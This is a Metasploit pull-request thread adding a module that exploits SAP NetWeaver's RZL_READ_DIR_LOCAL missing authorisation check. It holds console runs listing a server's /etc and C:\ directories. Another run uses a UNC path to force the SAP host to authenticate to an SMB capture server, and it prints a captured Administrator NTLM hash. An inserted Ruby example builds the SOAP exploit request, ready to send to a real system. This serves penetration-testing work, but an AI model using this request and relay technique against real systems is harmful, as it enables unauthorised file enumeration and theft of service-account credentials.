RZL_READ_DIR_LOCAL (directory listing and SMB relay) #1657

Merged
merged 1 commit into from May 2, 2013

2 participants

@nmonkee

This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL Missing Authorisation Check And SMB Relay Vulnerability. RZL_READ_DIR_LOCAL returns the file names in a given directory. It returns only the first 32 characters of a filename (truncated).

SAP Note 1595074 / DSECRG-12-026.

http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 2, 2013
Merged

Cleanup for sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay #5

@jvazquez-r7

Hi @nmonkee,

In nmonkee#5 I'm trying to cleanup sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay.rb. Please feel free to review, discuss, test, etc any of the changes proposed. Once you feel comfortable just land the pull request in your repository and this one will be automatically updated. And we'll be ready to merge it.

Also, you might want to check our docs on landing pull requests, https://github.com/rapid7/metasploit-framework/wiki/Landing-Pull-Requests , and it would be nice if you take into account the benefits of clean, short, informative merge commit messages: git merge --no-ff --edit and sticking to the usual 50/72 formatting for commits makes for pleasantly readable logs.

Don't hesitate to ask about any doubts and, also, if while we work on these modules you feel comfortable enough and have the time to incorporate these recommendations into the existing SAP pull requests, it would accelerate things for sure :-) Anyway, I will keep helping with these pull requests!

Summary of Changes:

  • Keep modules filenames shorter.
  • Run tools/msftidy.rb, modules must be compliant.
  • Use the guidelines proposed on https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient when using HTTPClient.
  • Since it's a Scanner module, in order to avoid verbosity, try to use print only for the minimum information possible (normally success). For the other prints use the verbose print => vprint_*
  • Please add the name of the vulnerability discoverer to the Authors section when available; it helps to document modules.
  • Please add known references such as OSVDB, BID or CVE to the References section when available; it helps to document modules.
  • When there are required options, always make things easier by providing a default option if possible.
  • Parsing profitable information, in this case the dir enumeration from the XML response, helps to present the results better. Even when storing the loot, it is a good thing to store the full response. Even in this Scanner module the parsed results are only shown to the user when VERBOSE = true.

Thanks!

@jvazquez-r7

Testing result after code cleanup:

  • No verbose mode
msf auxiliary(sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to enumerate /etc
[+] 192.168.172.179:8042 - /etc successfully enumerated, results stored on /Users/juan/.msf4/loot/20130501213219_default_192.168.172.179_sap.soap.rfc.dir_782389.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • Verbose mode
msf auxiliary(sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to enumerate /etc
[+] 192.168.172.179:8042 - /etc successfully enumerated, results stored on /Users/juan/.msf4/loot/20130501213427_default_192.168.172.179_sap.soap.rfc.dir_499762.bin
Entry: , Size: 0
Entry: ., Size: 12288
Entry: .., Size: 4096
Entry: apache2, Size: 4096
Entry: rpc, Size: 1615
Entry: netconfig.d, Size: 4096
Entry: gssapi_mech.conf, Size: 842
Entry: gtk-2.0, Size: 4096
Entry: idmapd.conf, Size: 144
Entry: permissions.local, Size: 1353
Entry: slsh.rc, Size: 1377
Entry: a2ps.cfg, Size: 15161
Entry: permissions.d, Size: 4096
Entry: passwd, Size: 1669
Entry: rwtab, Size: 858
Entry: powerd.conf, Size: 112
Entry: pango, Size: 4096
Entry: sgml, Size: 4096
Entry: mail.rc, Size: 112
Entry: sysctl.conf~, Size: 501
Entry: auto.net, Size: 1237
Entry: passwd.old, Size: 1622
Entry: manpath.config, Size: 11523
Entry: opensc.conf, Size: 10468
Entry: suseRegister.conf, Size: 456
Entry: generateCRL.conf, Size: 448
Entry: xml, Size: 4096
Entry: aliases, Size: 2579
Entry: ethers, Size: 605
Entry: filesystems, Size: 26
Entry: logrotate.d, Size: 4096
Entry: gre.d, Size: 4096
Entry: xscreensaver, Size: 12288
Entry: pwdutils, Size: 4096
Entry: jvm, Size: 4096
Entry: gnupg, Size: 4096
Entry: modprobe.d, Size: 4096
Entry: mime.types, Size: 12954
Entry: SuSE-brand, Size: 43
Entry: ld.so.cache, Size: 58637
Entry: raw, Size: 222
Entry: krb5.conf, Size: 297
Entry: gai.conf, Size: 2689
Entry: syslog-ng, Size: 4096
Entry: cups, Size: 4096
Entry: magic, Size: 113
Entry: init.d, Size: 4096
Entry: hosts.deny, Size: 149
Entry: sensors3.conf, Size: 71262
Entry: resolv.conf, Size: 847
Entry: fstab, Size: 528
Entry: gnome-vfs-2.0, Size: 4096
Entry: netconfig, Size: 767
Entry: pythonstart, Size: 736
Entry: yastws, Size: 4096
Entry: idn.conf, Size: 1810
Entry: rsyncd.conf, Size: 322
Entry: security, Size: 4096
Entry: iscsid.conf, Size: 10957
Entry: xinetd.conf, Size: 623
Entry: lsb-release.d, Size: 4096
Entry: gnome_defaults.conf, Size: 2431
Entry: defkeymap.name, Size: 45
Entry: sound, Size: 4096
Entry: rpm, Size: 4096
Entry: rc.status, Size: 10263
Entry: termcap, Size: 969976
Entry: protocols, Size: 23232
Entry: cron.d, Size: 4096
Entry: modprobe.conf, Size: 10374
Entry: wgetrc, Size: 4306
Entry: smsetup.conf, Size: 1542
Entry: sensors.conf, Size: 85179
Entry: aliases.db, Size: 12288
Entry: susehelp.d, Size: 4096
Entry: csh.login, Size: 7486
Entry: slp.conf, Size: 9800
Entry: motd, Size: 0
Entry: alternatives, Size: 4096
Entry: ImagePackages, Size: 74735
Entry: lighttpd, Size: 4096
Entry: at.deny, Size: 144
Entry: ImageVersion, Size: 32
Entry: permissions, Size: 9643
Entry: networks, Size: 225
Entry: fonts, Size: 4096
Entry: lesskey, Size: 899
Entry: crontab, Size: 255
Entry: HOSTNAME, Size: 22
Entry: hal, Size: 4096
Entry: hushlogins, Size: 1
Entry: auto.misc, Size: 524
Entry: auto.master, Size: 660
Entry: acpi, Size: 4096
Entry: autofs_ldap_auth.conf, Size: 232
Entry: collectd.conf, Size: 15974
Entry: pam.d, Size: 4096
Entry: hosts.equiv, Size: 188
Entry: sysstat, Size: 4096
Entry: bindresvport.blacklist, Size: 415
Entry: ssh, Size: 4096
Entry: bonobo-activation, Size: 4096
Entry: ldap.conf, Size: 9574
Entry: sfcb, Size: 4096
Entry: postfix, Size: 4096
Entry: default, Size: 4096
Entry: exports, Size: 322
Entry: ntp.keys, Size: 12
Entry: iscsi, Size: 4096
Entry: hosts, Size: 827
Entry: ld.so.conf.d, Size: 4096
Entry: SuSEconfig, Size: 4096
Entry: a2ps-site.cfg, Size: 2565
Entry: libaudit.conf, Size: 191
Entry: profile.d, Size: 4096
Entry: shadow.old, Size: 930
Entry: webyast, Size: 4096
Entry: insserv.conf, Size: 764
Entry: bash_completion.d, Size: 4096
Entry: openwsman, Size: 4096
Entry: news, Size: 4096
Entry: dbus-1, Size: 4096
Entry: apparmor.d, Size: 4096
Entry: X11, Size: 4096
Entry: mailcap, Size: 4797
Entry: ppp, Size: 4096
Entry: localtime, Size: 3661
Entry: gdm, Size: 4096
Entry: rsyncd.secrets, Size: 14
Entry: defkeymap.map, Size: 30816
Entry: sasl2, Size: 4096
Entry: profile, Size: 9801
Entry: ntp.conf, Size: 2028
Entry: resolv.conf.netconfig, Size: 846
Entry: depmod.d, Size: 4096
Entry: depmod.conf, Size: 416
Entry: group.old, Size: 682
Entry: foomatic, Size: 4096
Entry: rpasswd.conf, Size: 94
Entry: hosts.lpd, Size: 191
Entry: hosts.allow, Size: 2639
Entry: yast_user_roles, Size: 326
Entry: gpm, Size: 4096
Entry: named.d, Size: 4096
Entry: cron.hourly, Size: 4096
Entry: slp.reg.d, Size: 4096
Entry: libvirt, Size: 4096
Entry: aclocal_dirlist, Size: 25
Entry: pm, Size: 4096
Entry: ssl, Size: 4096
Entry: auto.smb, Size: 687
Entry: modprobe.conf.local, Size: 47
Entry: DIR_COLORS, Size: 2863
Entry: cron.weekly, Size: 4096
Entry: PackageKit, Size: 4096
Entry: services.testdrive, Size: 765073
Entry: ConsoleKit, Size: 4096
Entry: slp.spi, Size: 2707
Entry: opt, Size: 4096
Entry: securetty, Size: 161
Entry: sysconfig, Size: 4096
Entry: request-key.conf, Size: 1586
Entry: omc, Size: 4096
Entry: udev, Size: 4096
Entry: sysctl.conf, Size: 755
Entry: reader.conf.d, Size: 4096
Entry: ld.so.conf, Size: 262
Entry: shells, Size: 179
Entry: gnome-vfs-mime-magic, Size: 10793
Entry: openldap, Size: 4096
Entry: login.defs, Size: 4749
Entry: grub.conf, Size: 57
Entry: jvm-commmon, Size: 4096
Entry: rc.splash, Size: 2700
Entry: maven, Size: 4096
Entry: group, Size: 689
Entry: blkid.conf, Size: 135
Entry: yp.conf, Size: 779
Entry: pulse, Size: 4096
Entry: samba, Size: 4096
Entry: netgroup, Size: 796
Entry: NetworkManager, Size: 4096
Entry: apparmor, Size: 4096
Entry: lvm, Size: 4096
Entry: aliases.d, Size: 4096
Entry: scsi_id.config, Size: 666
Entry: uucp, Size: 4096
Entry: rc.d.README, Size: 614
Entry: xinetd.d, Size: 4096
Entry: issue.net, Size: 75
Entry: pnm2ppa.conf, Size: 7636
Entry: modprobe.conf.YaST2save, Size: 10373
Entry: inittab, Size: 2981
Entry: services, Size: 765091
Entry: bootsplash, Size: 4096
Entry: drirc, Size: 645
Entry: Muttrc, Size: 117386
Entry: xattr.conf, Size: 654
Entry: autoinstall, Size: 4096
Entry: SuSE-release, Size: 69
Entry: vimrc, Size: 5819
Entry: xdg, Size: 4096
Entry: idnalias.conf, Size: 207
Entry: .pwd.lock, Size: 0
Entry: environment, Size: 97
Entry: YaST2, Size: 4096
Entry: zypp, Size: 4096
Entry: printcap, Size: 135
Entry: logrotate.conf, Size: 897
Entry: lesskey.bin, Size: 405
Entry: mke2fs.conf, Size: 803
Entry: iproute2, Size: 4096
Entry: lsb-release, Size: 110
Entry: nsswitch.conf, Size: 1192
Entry: bash.bashrc, Size: 8727
Entry: permissions.paranoid, Size: 22290
Entry: resolv.conf~, Size: 846
Entry: skel, Size: 4096
Entry: rwtab.d, Size: 4096
Entry: cups-autoconfig.conf, Size: 79
Entry: products.d, Size: 4096
Entry: issue, Size: 78
Entry: cron.deny, Size: 11
Entry: ghostscript, Size: 4096
Entry: sysctl.backup, Size: 677
Entry: java, Size: 4096
Entry: dnsmasq.conf, Size: 18485
Entry: hp, Size: 4096
Entry: shadow, Size: 963
Entry: permissions.easy, Size: 21052
Entry: host.conf, Size: 370
Entry: mtab, Size: 723
Entry: cron.monthly, Size: 4096
Entry: defaultdomain, Size: 0
Entry: gconf, Size: 4096
Entry: PolicyKit, Size: 4096
Entry: ttytype, Size: 258
Entry: cron.daily, Size: 4096
Entry: icewm, Size: 4096
Entry: inputrc, Size: 13516
Entry: csh.cshrc, Size: 5322
Entry: papersize, Size: 3
Entry: hosts.YaST2save, Size: 775
Entry: rc.d, Size: 4096
Entry: ftpusers, Size: 565
Entry: permissions.secure, Size: 23966
Entry: mtools.conf, Size: 1447
[*] Scanned 1 of 1 hosts (100% complete)

@nmonkee

msf > use auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RHOSTS 10.0.7.50
RHOSTS => 10.0.7.50
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RPORT 8042
RPORT => 8042
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[+] 10.0.7.50:8042 - /etc successfully enumerated, results stored on /Users/nmonkee/.msf4/loot/20130502094348_default_10.0.7.50_sap.soap.rfc.dir_288313.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set SRVHOST 10.0.7.13
SRVHOST => 10.0.7.13
msf auxiliary(smb) > run -j
[*] Auxiliary module running as background job
[*] Server started.

msf auxiliary(smb) > use auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RHOSTS 10.0.7.8
RHOSTS => 10.0.7.8
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RPORT 8000
RPORT => 8000

msf auxiliary(sap_soap_rfc_rzl_read_dir) > set DIR C:\\
DIR => C:\
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[+] 10.0.7.8:8000 - C:\ successfully enumerated, results stored on /Users/nmonkee/.msf4/loot/20130502104221_default_10.0.7.8_sap.soap.rfc.dir_153972.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(sap_soap_rfc_rzl_read_dir) > set DIR \\10.0.7.13\share
DIR => \\10.0.7.13\share
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[*] SMB Captured - 2013-05-02 10:43:00 +0100
NTLMv1 Response Captured from 10.0.7.8:49497 - 10.0.7.8
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
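The exchange behind the two test runs above (a local directory listing, then a UNC path that makes the SAP host authenticate to the capture server), and the XML parsing that the cleanup summary asks for, as an added example. This is not the pull request's module nor SAP code. It assumes, from the function module's signature and the PR text, that RZL_READ_DIR_LOCAL takes the directory in its NAME import parameter and fills a FILE_TBL table of NAME/SIZE rows with NAME cut to 32 characters; it assumes the NetWeaver SOAP RFC handler at /sap/bc/soap/rfc takes HTTP Basic credentials and a sap-client query parameter, and that the SOAPAction value below is accepted. The reply and fault documents are constructed, not captured.

```ruby
# Added example (not the PR's module): build the RZL_READ_DIR_LOCAL SOAP RFC
# request, flag UNC paths that trigger outbound SMB from the SAP host, and
# parse the FILE_TBL reply. Offline: the replies below are constructed.
require 'rexml/document'

RFC_NS        = 'urn:sap-com:document:sap:rfc:functions'
ENV_NS        = 'http://schemas.xmlsoap.org/soap/envelope/'
SOAP_RFC_PATH = '/sap/bc/soap/rfc'   # assumption: standard NetWeaver SOAP RFC handler
NAME_WIDTH    = 32                   # from the PR text: file names come back truncated

# SOAP body for one call. REXML escapes <, > and & in the directory string, so
# an odd DIR value cannot break out of the NAME element.
def build_rzl_read_dir_request(dir)
  doc = REXML::Document.new
  doc << REXML::XMLDecl.new('1.0', 'UTF-8')
  env  = doc.add_element('env:Envelope', 'xmlns:env' => ENV_NS)
  call = env.add_element('env:Body').add_element('n1:RZL_READ_DIR_LOCAL', 'xmlns:n1' => RFC_NS)
  call.add_element('NAME').text = dir
  row = call.add_element('FILE_TBL').add_element('item')  # empty row selects the table to return
  row.add_element('NAME')
  row.add_element('SIZE')
  doc.to_s
end

# The HTTP request as a hash. The handler authenticates the caller with Basic
# auth; the missing check is inside the function module, not at the transport,
# so any valid SAP user for that client will do.
def soap_rfc_request(dir, client:, username:, password:)
  {
    method: 'POST',
    path: "#{SOAP_RFC_PATH}?sap-client=#{client}",
    headers: {
      'Content-Type'  => 'text/xml; charset=UTF-8',
      'SOAPAction'    => RFC_NS,   # assumption: value accepted by the handler
      'Authorization' => 'Basic ' + ["#{username}:#{password}"].pack('m0')
    },
    body: build_rzl_read_dir_request(dir)
  }
end

# \\host\share makes the SAP work process (running as the service account,
# Administrator in the PR's Windows test) open an SMB session to host. That is
# the capture step above; flag it so the operator knows a third host is hit.
def unc_path?(dir)
  !!(dir =~ /\A\\\\[^\\]+\\[^\\]+/)
end

# faultstring of a SOAP fault (bad logon, no such directory), else nil.
def soap_fault(xml)
  fault = REXML::XPath.first(REXML::Document.new(xml), '//faultstring')
  fault && fault.text
end

# FILE_TBL rows as {name:, size:, truncated:}. Prefix-agnostic XPath because the
# response prefix (rfc:, urn:, n0:) differs between NetWeaver releases.
def parse_rzl_read_dir_response(xml)
  REXML::XPath.match(REXML::Document.new(xml), '//FILE_TBL/item').map do |item|
    name_el = item.elements['NAME']
    size_el = item.elements['SIZE']
    name = name_el && name_el.text ? name_el.text : ''
    size = size_el && size_el.text ? size_el.text.to_i : 0
    # Exactly 32 characters may be the head of a longer name.
    { name: name, size: size, truncated: name.length >= NAME_WIDTH }
  end
end

# Constructed reply; the last row shows a longer name after 32-char truncation.
SAMPLE_RESPONSE = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <rfc:RZL_READ_DIR_LOCAL.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
        <FILE_TBL>
          <item><NAME>.</NAME><SIZE>12288</SIZE></item>
          <item><NAME>apache2</NAME><SIZE>4096</SIZE></item>
          <item><NAME>passwd</NAME><SIZE>1669</SIZE></item>
          <item><NAME>a_very_long_file_name_that_is_tr</NAME><SIZE>10</SIZE></item>
        </FILE_TBL>
      </rfc:RZL_READ_DIR_LOCAL.Response>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML

# Constructed fault, the shape seen for a failed logon.
SAMPLE_FAULT = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode>
    <faultstring>Logon failed</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML

if __FILE__ == $PROGRAM_NAME
  dir = '\\\\10.0.7.13\\share'
  warn "DIR #{dir} is a UNC path: the SAP host will authenticate to 10.0.7.13 over SMB" if unc_path?(dir)
  puts soap_rfc_request(dir, client: '001', username: 'SAP*', password: 'secret')[:body]
  parse_rzl_read_dir_response(SAMPLE_RESPONSE).each do |e|
    puts "Entry: #{e[:name]}, Size: #{e[:size]}#{' (possibly truncated)' if e[:truncated]}"
  end
  puts "Fault: #{soap_fault(SAMPLE_FAULT)}"
end
```

Run it as a script to see the envelope and the parsed rows; wire `soap_rfc_request` to an HTTP client to talk to a real system. The `truncated` flag is the practical caveat: a 32-character entry from this function may be a longer file name, so anything you plan to open afterwards needs confirming by another means.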

@nmonkee nmonkee Merge pull request #5 from jvazquez-r7/sap_soap_rfc_rzl_read_dir_local_dir_cleanup

Cleanup for sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay
8e9789b
@jvazquez-r7

Merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 2, 2013
jvazquez-r7 Land #1657, @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module 4054d91
@jvazquez-r7 jvazquez-r7 merged commit 8e9789b into rapid7:master May 2, 2013

1 check passed: The Travis build passed
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay_ branch May 9, 2013